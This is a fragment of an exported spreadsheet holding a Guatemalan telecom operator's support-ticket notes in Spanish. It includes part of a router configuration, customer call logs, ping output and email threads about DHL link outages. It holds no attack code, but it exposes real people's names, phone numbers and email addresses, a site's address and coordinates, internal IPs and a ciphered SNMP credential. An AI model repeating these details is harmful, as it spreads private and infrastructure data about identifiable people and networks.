 IP ADDRESS NEGOTIATE
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.198.137 255.255.255.255
#
INTERFACE TUNNEL0/0/0
 IP ADDRESS UNNUMBERED INTERFACE LOOPBACK5
 TUNNEL-PROTOCOL GRE
 SOURCE CELLULAR0/0/0
 DESTINATION 1.1.1.100
#
DIALER-RULE
 DIALER-RULE 1 IP PERMIT
#
APN PROFILE INCOMEL.CLARO
 APN INCOMEL.CLARO
#
CELLULAR PROFILE DEFAULT
 MODEM AUTO-RECOVERY DIAL ACTION MODEM-REBOOT FAIL-TIMES 128
 MODEM AUTO-RECOVERY ICMP-UNREACHABLE ACTION MODEM-REBOOT
 MODEM AUTO-RECOVERY SERVICES-UNAVAILABLE ACTION MODEM-REBOOT TEST-TIMES 0 INTERVAL 3600
#
OSPF 1 ROUTER-ID 10.87.207.43
 IMPORT-ROUTE DIRECT ROUTE-POLICY LAN
 SILENT-INTERFACE ALL
 UNDO SILENT-INTERFACE GIGABITETHERNET0/0/4
 PEER 10.87.207.41
 PREFERENCE 110
 PREFERENCE ASE 110
 AREA 0.0.1.185
  NETWORK 10.87.207.40 0.0.0.7
#
ROUTE-POLICY LAN PERMIT NODE 10
 IF-MATCH IP-PREFIX LAN
#
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 1200
#
 CPU-DEFEND-POLICY ICMP
#
UNDO ICMP NAME TIMESTAMP-REQUEST RECEIVE
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0320AB48A98A04
 SNMP-AGENT COMMUNITY READ %^%#XU;C5MF^R/C'\PJQQF}F|-2U:OK11$=:/9V-UWX&amp;&gt;)--)%UK)@!I'IE59HL.IB\E&lt;|%1'T&amp;KI:)RUEO@%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION 4 CALLE ZONA 1 POPTUN, PETEN 16.331381, -89.421967
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT TRAP ENABLE
 SNMP-AGENT PERMIT INTERFACE ALL
 SNMP-AGENT
#
 TELNET SERVER ENABLE
 TELNET SERVER PERMIT INTERFACE GIGABITETHERNET0/0/4 CELLULAR0/0/0
#
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE GIGABITETHERNET0/0/0 WLAN-RADIO0/0/0
#
IP IP-PREFIX LAN INDEX 10 PERMIT 192.167.51.0 24
IP IP-PREFIX LAN INDEX 20 PERMIT 10.212.198.137 32
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 TUNNEL0/0/0 PREFERENCE 240
IP ROUTE-STATIC 1.1.1.100 255.255.255.255 CELLULAR0/0/0 PREFERENCE 240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MS-CHANNEL
#
RETURN
&lt;CC_IND_COMERCIALIZADORA_ELECTRODOMESTICOS_GT_4C_Z1_POPTUN_PETEN&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE AL PR AL 42149422 CONTESTA LA SEÑORITA CAROLINA INDICA QUE VERIFICARA EN QUE PUERTO ESTA CONECTADO EL ROUTER || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001623282
**</t>
  </si>
  <si>
    <t>F4580382</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL WERNER LOAIZA 2420-7200 ID: 2001649256 ATIENDE MOISES VALIDA SERVICIO OK Y AUTORIZA EL CIERRE DEL TICKET*/*/*/*SE NOTIFICA A GESTOR JUAN.LOPEZS POR SKYPE PARA QUE PROCEDA AL CIERRE DE LA F4580382*/*/*/</t>
  </si>
  <si>
    <t>F4580389</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO CHACÓN 25214424  MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO, POSIBLEMENTE FUE PROBLEMA DE ENERGIA
-ID 2001639739</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2521-4424 NO RESPONDE SE INTENTARA LUEGO **
ID 2001630194
**</t>
  </si>
  <si>
    <t>F4580399</t>
  </si>
  <si>
    <t>F4580401</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   ELMER 72956254 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001645593</t>
  </si>
  <si>
    <t>**SE LE LLAMA  AL SEÑOR  ELMER AL 72956254 SOLICITA QUE SE LE LLAME EN 10 MIN YA QUE AHORITA ESTA OCUPADO **
ID 2001632532
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO AL 70550036 INDICA QUE EL NO ESTA EN SITIO SOLICITA QUE SE LE LLAME AL SEÑOR  ELMER AL 72956254 **
ID 2001631885
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   ELMER 72956254  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001636835 - 2001636959</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE   ELMER AL 72956254 INDICA QUE PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR E INDICA QUE CL TIENE QUE REVISAR LA RED INTERNA SE LE HIBA A INDICAR A CL PERO YA NO ESCUCHO SE LE CORTA LLAMADA Y SE VUELVE A TIMBRAR PERO NO RESPONDE**
ID 2001656377 - 2001657945
**</t>
  </si>
  <si>
    <t>F4580405</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE XINIA AYALA AL 22109500 CONTESTA LA SEÑORITA DEYSI  QUIEN SOLICITA INFORMACION VIA CORREO YA QUE INDICA QUE NO LE APARECE INFORMACION DE ESTE TICKET || SE NOTIFICA A GESTOR **
ID 2001633556
**</t>
  </si>
  <si>
    <t>F4580421</t>
  </si>
  <si>
    <t>F4580441</t>
  </si>
  <si>
    <t>SE APLICA REINICIO A LOS EQUIPOS CON APOYO DEL CLIENTE CARLOS OVANDO, Y SERVICIO RESTABLE POR LO QUE AUTORIZA CIERRE DE CASO.
2001609416
COLA:
NOMBRE: A: 58262098
NÚMERO: 58262098
DURACIÓN: 0:07:35
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58262098
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 27/05/2022 13:06:44
&lt;GVNUGTVNN2D2C04A02EIM3&gt;PING  -C 500 -S 1500 -B -M 30 -VPN  RCT 10.31.101.3
  PING 10.31.101.3: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.31.101.3 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/12 MS
&lt;GVNUGTVNN2D2C04A02EIM3&gt;</t>
  </si>
  <si>
    <t>F4580446</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A KEVIN VILLANUEVA/CLIENTE; SE LE INFORMA QUE TÉCNICO YA ESTÁ EN PR HACIENDO LAS REVISIONES, AVANCES EN 25/35 MINUTOS.</t>
  </si>
  <si>
    <t>F4580475</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TELMA AL 89956589 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001618250
**</t>
  </si>
  <si>
    <t>F4580477</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE----
RE: REPORTANDO - AVIANCA * GUATEMALA * AV-GUA-GUAATO-02 * CID 437182 &amp; 1014485 * PACKET LOSS* INC000003743874 * SEV 3</t>
  </si>
  <si>
    <t>NO SE HA TENIDO RESPUESTA DE CLIENTE VÍA CORREO; SE LE PIDE APOYO DE NUEVO POR LA MISMA VÍA, EN ESPERA.</t>
  </si>
  <si>
    <t>F4580478</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DORCAS GUARCHAJ AL 48654090 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE DEJE PARA LAS 16:30 HRS EN OBSERVACION Y QUE SE LE VUELVA A LLAMAR PARA CONFIRMAR**
ID 2001625530
**</t>
  </si>
  <si>
    <t>F4580479</t>
  </si>
  <si>
    <t>***---  SE RECIBE CORREO DE TELMEX INDICANDO QUE VALIDARA SOBRE LOS IDS NOTIFICADOS PERO CONSULTA SOBRE EL OTRO LISTADO QUE COMPARTE QUE AVANCES SE TIENE  Y/O SI SE REALIZARON CAMBIOS --**
DE: LAZCANO MEJIA IRVIN YAIR [MAILTO:ILMEJIA@UNINET.COM.MX]
ENVIADO EL: LUNES, 30 DE MAYO DE 2022 03:40
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ROMANO LOPEZ GILBERTO ADOLFO &lt;RLOPEZG@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; COHETERO SORIANO GERARDO &lt;GCOHETER@UNINET.COM.MX&gt;; AMACOSTA REYES OMAR OSVALDO &lt;AREYESO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; KEVIN ISMAEL GUERRA MALDONADO &lt;KEVIN.GUERRA@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMA DE ENRUTAMIENTO || DHL || COSTA RICA || CONTR0001196590OC || IMDHG006677
ESTIMADOS, BUEN DÍA,
GRACIAS POR SUS COMENTARIOS. LO VALIDAREMOS Y DAREMOS RETROALIMENTACIÓN EN UN MOMENTO.   ¿NOS PODRÍAN INDICAR DE IGUAL FORMA EL ESTADO DE LA SOLICITUD REALIZADA PARA LA LISTA DE SERVICIOS ADICIONAL QUE SE COMPARTIÓ EN NUESTRO CORREO PREVIO? SE TRATA DE LOS SERVICIOS PARA DHL EXPRESS PARA APLICAR LOS MISMOS CAMBIOS.
QUEDAMOS ATENTOS.</t>
  </si>
  <si>
    <t>***---  SE RETROALIMENTA A CL Y SE PIDE VALIDAR LOS ENLACES ACTIVOS -**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 31 DE MAYO DE 2022 04:36
PARA: LAZCANO MEJIA IRVIN YAIR &lt;ILMEJIA@UNINET.COM.MX&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; AMACOSTA REYES OMAR OSVALDO &lt;AREYESO@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ALVARADO HERNANDEZ MARIANO &lt;AHMARIAN@UNINET.COM.MX&gt;; SANCHEZ MANRRIQUEZ MARIA GUADALUPE &lt;MSMANRRI@UNINET.COM.MX&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; KEVIN ISMAEL GUERRA MALDONADO &lt;KEVIN.GUERRA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMA DE ENRUTAMIENTO || DHL || COSTA RICA || CONTR0001196590OC || IMDHG006677
ESTIMADO SR. LAZCANO.
                CONTINUANDO CON EL SEGUIMIENTO, ADJUNTO TABLA CON DETALLE DE CADA UNO DE LOS 3 ENLACES QUE NOS REPORTA CON INCONVENIENTES.
WAN IP	ENLACE A REPORTAR	ESTATUS
187.128.48.158	CONTR0001212365OC	BAJA A SOLICITUD DEL CLIENTE TICKET ANTERIOR IMDHG006281 / SD1094589 CON DICHO DIAGNOSTICO
187.128.48.118	CONTR0001212361OC	CAIDO / SE INGRESO EL TICKET SD1130584 PARA REVISIÓN INDIVIDUAL
187.128.73.214	CONTR0002761837OC	ACTIVO
PODRÍA APOYARNOS A VALIDAR EL FUNCIONAMIENTO DEL ENLACE CONTR0002761837OC.
PARA EL ENLACE CONTR0001212361OC, ACTUALMENTE LOS COMPAÑEROS REVISAN POR MEDIO DEL TICKET SD1130584 Y ESPERAMOS COMPARTIR AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.</t>
  </si>
  <si>
    <t>***--- TELMEX INDICA QUE AUN VEN CAIDOS LOS SERVICIOS --*-*  SE NOTIFICA A CNOC VÍA SKYPE ---**
DE: LAZCANO MEJIA IRVIN YAIR [MAILTO:ILMEJIA@UNINET.COM.MX]
ENVIADO EL: MARTES, 31 DE MAYO DE 2022 00:35
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; AMACOSTA REYES OMAR OSVALDO &lt;AREYESO@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ALVARADO HERNANDEZ MARIANO &lt;AHMARIAN@UNINET.COM.MX&gt;; SANCHEZ MANRRIQUEZ MARIA GUADALUPE &lt;MSMANRRI@UNINET.COM.MX&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; KEVIN ISMAEL GUERRA MALDONADO &lt;KEVIN.GUERRA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMA DE ENRUTAMIENTO || DHL || COSTA RICA || CONTR0001196590OC || IMDHG006677
ESTIMADOS, BUEN DÍA,
CONTINUAMOS OBSERVANDO AFECTACIÓN EN LOS ENLACES REPORTADOS COMO CAÍDOS.  CONTINUAMOS OBSERVÁNDOLOS INALCANZABLES ¿NOS PODRÍAN APOYAR VALIDANDO NUEVAMENTE ESOS SERVICIOS?
QUEDAMOS ATENTOS A SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5298 RESPONDE GUADALUPE SANCHEZ PERO DEJA EN ESPERA Y NO RETOMA LA LLAMADA
-ID 3001076375</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIETNE PARA VALIDAR ENLACE.
RE: PROBLEMA DE ENRUTAMIENTO || DHL || COSTA RICA || CONTR0001196590OC || IMDHG006677
¿</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE TELMEX INDICANDO QUE HAY TRES ENLACES QUE AUN TIENEN PROBLEMAS -***  ADICIONAL SOLIICTA PRUEBAS
DE: LAZCANO MEJIA IRVIN YAIR [MAILTO:ILMEJIA@UNINET.COM.MX]
ENVIADO EL: LUNES, 30 DE MAYO DE 2022 00:44
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ROMANO LOPEZ GILBERTO ADOLFO &lt;RLOPEZG@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; COHETERO SORIANO GERARDO &lt;GCOHETER@UNINET.COM.MX&gt;; AMACOSTA REYES OMAR OSVALDO &lt;AREYESO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; KEVIN ISMAEL GUERRA MALDONADO &lt;KEVIN.GUERRA@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMA DE ENRUTAMIENTO || DHL || COSTA RICA || CONTR0001196590OC || IMDHG006677
ESTIMADOS, BUEN DÍA,
HEMOS REALIZADO LA REVISIÓN DE LOS SERVICIOS Y AÚN OBSERVAMOS 3 SITIOS CON LA PROBLEMÁTICA, POR FAVOR SU APOYO CON ESTOS CASOS PUNTUALES:
CONTR0001196587OC
CONTR0001211527OC
CONTR0001212359OC
ADICIONALMENTE, DE FORMA ADJUNTA COMPARTIMOS UNA TABLA CON UN LISTADO DE SERVICIOS DE DHL EXPRESS EN LOS CUALES SOLICITAMOS SU APOYO PARA REALIZAR LOS MISMOS CAMBIOS.
QUEDAMOS ATENTOS A SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4580489</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VERONICA ESTRADA -42189553
2001616031
COLA:
NOMBRE: A: 42189553
NÚMERO: 42189553
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 42189553
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 13:18:54</t>
  </si>
  <si>
    <t>F4580491</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MILTON HERNANDEZ AL 54786367 CLIENTE INDICA QUE ESTA REALIZANDO PRUEBAS Y QUE SE LE LLAME EN 5 MIN NUEVAMENTE**
ID 2001617384 - 2001617605
**</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MILTON 54786367 PARA VALIDAR EL ESTADO DEL SERVICIO PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MILTON 54786367  PERO SIGUE SIN CONTESTAR, FAVOR CC GT CONFIRMAR CON CLIENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MILTON HERNANDEZ AL 54786367 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001620834
**</t>
  </si>
  <si>
    <t>F4580517</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ROBERTO GONZÁLEZ/CENTRAL Y A ISMAEL/PR; LO QUE ESTÁN CONSULTANDO ES SOBRE EL SEGMENTO LISTADO; SE PIDE APOYO A ALEJANDRO NAVARRO/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE HABLÓ CON ROBERTO GONZÁLEZ/CLIENTE 55044212 INDICA QUE PERSISTE LO REPORTADO, ASEGURA QUE EL ID ERA 729700003, PERO ESE SE MODIFICÓ POR ESTE ID; INDICA QUE HACE UNOS DÍAZ HICIERON UPGRADE A 40MBPS.
NO HAY NINGÚN PROYECTO U OT DONDE HICIERON EL UPGRADE, SE VERIFICA EN PÁGINA ABC, CLIENTE PYMES/TARJETAZO.</t>
  </si>
  <si>
    <t>F4580526</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL  41256236 / 42948198 EN EL PRIMERO NO RESPONDEN Y EL SEGUNDO CONTESTAN PERO CORTAN LLAMADA || SE INTENTARA LUEGO **
ID 2001627533 - 2001628031
*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO ESCOBAR AL 30153240  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001628483
**</t>
  </si>
  <si>
    <t>F4580531</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM SALOMON 23820818 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001673773</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM SALOMON 23820818 NO RESPONDE,SE INTENTARA LUEGO
-ID 2001654303</t>
  </si>
  <si>
    <t>F4580542</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE ESTARAN COMPARTIENDO POR CORREO EL CONTACTO DE PR
-ID 2001654711</t>
  </si>
  <si>
    <t>F4580549</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MORALES 44524076  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001665626</t>
  </si>
  <si>
    <t>F4580556</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILSON  NOJ 40227560 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001646797</t>
  </si>
  <si>
    <t>DESPUES DEL REINICIO DE LOS EQUIPOS EL ASMI SIGUE ALARMADO, SE LE INDICA AL CLIENTE QUE SE ENVIARA PERSONAL TECNICO A REVISAR EL MEDIO YA QUE POSIBLEMENTE HAYA PROBLEMAS, CLIENTE NOS CONFIRMA QUE NO ES NECESARIO TRAMITAR PERMISOS PERO QUE LOS TECNICOS TIENEN QUE LLEVAR MASCARILLA KN95 DE LO CONTRARIO NO LO DEJARAN INGRESAR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI 52 EL CUAL ESTA ALARMADO DE LA SIGUIENTE FORMA
PWR  VERDE
ALM - ROJO
SHDSL SYNC - ROJO
CLIENTE NOS APOYA CON REINICIAR EL EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE WILSON  NOJ 40227560
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4580558</t>
  </si>
  <si>
    <t>SE LLAMA A VICTOR PERALTA PARA INDICARLE SI ES POSIBLE ENVIAR A ALGUIEN DE IT YA QUE SE REALIZO PRUEBAS CON PR Y SE DETERMINA QUE NO SE TIENE RACK O GABINETE ENERGIZADO, TODOS LOS EQUIPOS SE ENCUENTRAN APAGADOS, CLIENTE DESCONOCE COMO VALIDARLO.---
VICTOR NO RESPONDE---</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTOR PERALTA 46153837 MENCIONA QUE ESTA REALIZANDO PRUEBAS, SE LLAMARA EN 10 MIN
-ID 2001669322</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR PERALTA 46153837 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001674103</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE 40613693  RESPONDE SAIDA MUY QUIEN INDICA QUE LA VISITA SERÁ REPROGRAMADA PARA EL DÍA DE MAÑANA A LAS 08:00 HRS.
2001687423</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A VICTOR QUIEN SE LE NOTIFICA INCONVENIETE DE RACK / GABINETE  INDICA QUE ESTARA DANDO SEGUIMIENTO, SOLICITA LLAMADA EN 15 MINUTOS PARA VALIDAR SI LOGRARON RESOLVERLO---</t>
  </si>
  <si>
    <t>F4580560</t>
  </si>
  <si>
    <t>SE LLAMA AC LIENTE RODRIGO CARDONA-75393847 ##CLEINTE VALIDA ##VIVO</t>
  </si>
  <si>
    <t>##SE LLAMO A CLIENTE RODRIGO CARDONA-7 5393847  NOS COMENTA QUE  NO HA REVISADO EQUIPOS + QUE SE HA COORDINADO VISITA A CAMPO Y ESTA A LA ESPERA DE COMPAÑEROS ##
REF DE CL. SALVADOR PORTILLO-78432632##VIVO</t>
  </si>
  <si>
    <t>F4580562</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 56307637 NO CONTESTA; JOSÉ ARMANDO CHUC/CENTRAL 35731989 SE LE PIDE APOYO CON TELS ADICIONALES, ME BRINDA 35239043 CON JONNY MAEDA/PR; ÉSTE INDICA QUE ESTÁ EN PRADERA CONCEPCIÓN, ME BRINDA EL TEL 54828981 NO CONTESTA.
SE DEBE INTENTAR MÁS TARDE PARA CONTINUAR CON EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE JOSE ARMANDO SOLICITANDO AVANCES ID: 2001701478, SOLICITA SE LLAME A PR, SE LLAMA 56307637 MADELIN, SE DEJA EN CONFERENCIA CON SAMUEL.ESTRADAG PARA PRUEBAS PENDIENTES | EIP | CL CENTRAL INDICA QUE DE NO SOLUCIONARSE EL PROBLEMA CON ESTAS PRUEBAS SE LE LLAME PARA VERIFICAR RESOLUCION O VISITA</t>
  </si>
  <si>
    <t>JOSÉ ARMANDO CHUC/PR PIDE SE LLAME DE NUEVO A PR, SE LLAMÓ/HABLÓ CON GLORIA LÓPEZ PR 54828981 INDICA QUE ESTÁN OCUPADOS Y NO PUEDE APOYAR, PIDE SE LE LLAME EN UNA HORA PARA SEGUIMIENTO; PR SE RETIRA A LAS 20:00 HORAS.
SE LLAMÓ/HABLÓ CON CENTRAL 35731989 Y SE LE INFORMA LO DICHO POR PR</t>
  </si>
  <si>
